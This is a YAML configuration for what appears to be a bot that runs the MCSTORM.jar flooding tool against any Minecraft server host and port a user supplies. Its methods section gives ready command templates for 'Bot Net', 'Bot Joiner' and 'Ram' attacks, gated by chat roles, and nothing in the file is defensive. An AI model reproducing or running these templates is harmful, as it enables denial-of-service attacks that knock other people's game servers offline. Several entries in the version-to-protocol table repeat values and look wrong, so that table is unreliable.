run-option: 
  # This option will be suitable when running bot on host/node
  specified-java: false
  path: 
    # Path when SpecifiedJava: true
    enabled: '"$HOME/java8/bin/java"'
    # Path when SpecifiedJava: false
    disabled: "java"

general: 
  # Ask for a role when using methods:
  # * FULL -> You need to have all the required roles to be able to use.
  # * ONE -> You only need one of all the required roles to be able to use it.
  role-require-type: FULL

black-list-ip: 
  - "1.1.1.1"
  - "127.0.0.1"
  - "play.squadcube.tk"

version-code: 
  - version: "1.19.1"
    value: 760
  - version: "1.19.x"
    value: 759
  - version: "1.18.2"
    value: 758
  - version: "1.18.x"
    value: 757
  - version: "1.17.x"
    value: 756
  - version: "1.16.5"
    value: 754
  - version: "1.16.3"
    value: 753
  - version: "1.16.2"
    value: 751
  - version: "1.16.1"
    value: 756
  - version: "1.16"
    value: 753
  - version: "1.15.2"
    value: 578
  - version: "1.15.1"
    value: 575
  - version: "1.15"
    value: 753
  - version: "1.14.4"
    value: 498
  - version: "1.14.3"
    value: 490
  - version: "1.14.1"
    value: 480
  - version: "1.14"
    value: 477
  - version: "1.13.2"
    value: 404
  - version: "1.13.1"
    value: 401
  - version: "1.13"
    value: 393
  - version: "1.12.x"
    value: 340
  - version: "1.10.x"
    value: 210
  - version: "1.9.x"
    value: 110
  - version: "1.8.x"
    value: 47

methods: 
  - name: "Bot Net"
    id: "botnet"
    enabled: true
    roles: []
    run-bat: "{path} -Dperdelay=5000 -Ddelay=1 -Drmnwp=false -jar MCSTORM.jar {host}:{port} {version} botnet {time} -1"
  - name: "Bot Joiner"
    id: "botjoiner"
    enabled: true 
    roles: []
    run-bat: "{path} -Dperdelay=5000 -Ddelay=1 -Drmnwp=false -jar MCSTORM.jar {host}:{port} {version} botjoiner {time} -1"
  - name: "Ram"
    id: "ram"
    enabled: true
    roles: []
    run-bat: "{path} -Dperdelay=5000 -Ddelay=1 -Drmnwp=false -jar MCSTORM.jar {host}:{port} {version} ram {time} -1"
